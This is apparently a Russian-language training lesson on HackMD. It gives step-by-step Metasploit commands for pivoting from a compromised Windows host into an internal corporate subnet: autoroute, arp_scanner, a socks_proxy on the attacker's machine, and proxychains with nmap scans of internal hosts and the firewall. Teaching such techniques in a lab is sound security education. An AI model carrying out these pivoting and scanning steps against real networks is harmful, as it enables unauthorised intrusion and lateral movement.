# Stealers (sAINT) #### 1. Проведем атаку revers_tcp [Инструкция по настройке с прошлого урока](https://hackmd.io/_qkyluFDSeuE63lHwvchlQ?view#3-%D0%98%D1%81%D0%BF%D0%BE%D0%BB%D1%8C%D0%B7%D1%83%D0%B5%D0%BC-%D0%BF%D1%8D%D0%B9%D0%BB%D0%BE%D0%B0%D0%B4-meterpreter) #### 2. Эксплуатируем пэйлоад и атакуем внутренние узлы корпоративной сети > - Проверим в meterpreter какая сеть используется в инфраструктуре атакуемой машины - **`ipconfig`** > >  > > - роутим сеть атакованной винды > > - Первый способ > > **`run autoroute route -s 192.168.20.0/24`** > > Возможно этот способ может не отработать, если в винде юзер не с админ правами > > > - Второй способ > > 1. Прячем сессию в бэкграунд - **`bg`** > > 2. Используем скрипт - **`use post/multi/manage/autoroute`** > > 3. Смотрим какие необходимо прописать опции - **`show options`** > > 4. Указываем активную сессию - **`set session 4`** > > 5. Прописываем IP - **`set subnet 192.168.20.0`** > > 6. Запускаем - **`run`** > > >  > > > - Воспользуемся модулем **arp_scanner** в **meterpreter** > > > 1. Перейдем в активную сессию - **`session 4`** > > > 2. Просканируем сеть - **`run post/windows/gather/arp_scanner RHOSTS=192.168.20.0/24`** > > >  > > > - Используем **socks_proxy** делаем связку между metasploit framework и kali-linux > > 1. Отправим активную сессию в бэкграунд - **`bg`** > > 2. Используем скрипт прокси - **`use auxiliary/server/socks_proxy`** > > 3. Смотрим опции - **`show options`** > > 4. Укажем что прокси будет на нашем интерфейсе - **`set SRVHOST 172.30.51.90`** > > 5. Запускаем - **`run`** > > 6. В отдельном окне консоли проверим что прокся работает - > > **`ss -tunlp`** > > >  > > - Переходим к настройке браузера в нашей kali, чтобы могли открыть например **firewall** инфраструктуры > >  > > > Теперь есть доступ до FW > > > >  > > > - Воспользуемся **proxychains** для связки машины которую атакуем с нашим созданным прокси > > > 1. Отредактируем файл - nano **`/etc/proxychains.conf`** > > 2. Для добавления нашего прокси в цепочку, пропишем его внизу этого файла - **`socks5 172.30.51.90 1080`** > > >  > > > > 3. Проведем сканирование утилитой **nmap** через наш прокси-сервер - **`proxychains nmap -sT -sV -Pn -n -p22,80,445,135,139 192.168.20.10/24`** > > Для сканирования понадобится много времени ###### tags: `Cyber Infrastructure Threats`, `1 модуль`
×
Sign in
Email
Password
Forgot password
or
By clicking below, you agree to our
terms of service
.
Sign in via Facebook
Sign in via Twitter
Sign in via GitHub
Sign in via Dropbox
Sign in with Wallet
Wallet (
)
Connect another wallet
New to HackMD?
Sign up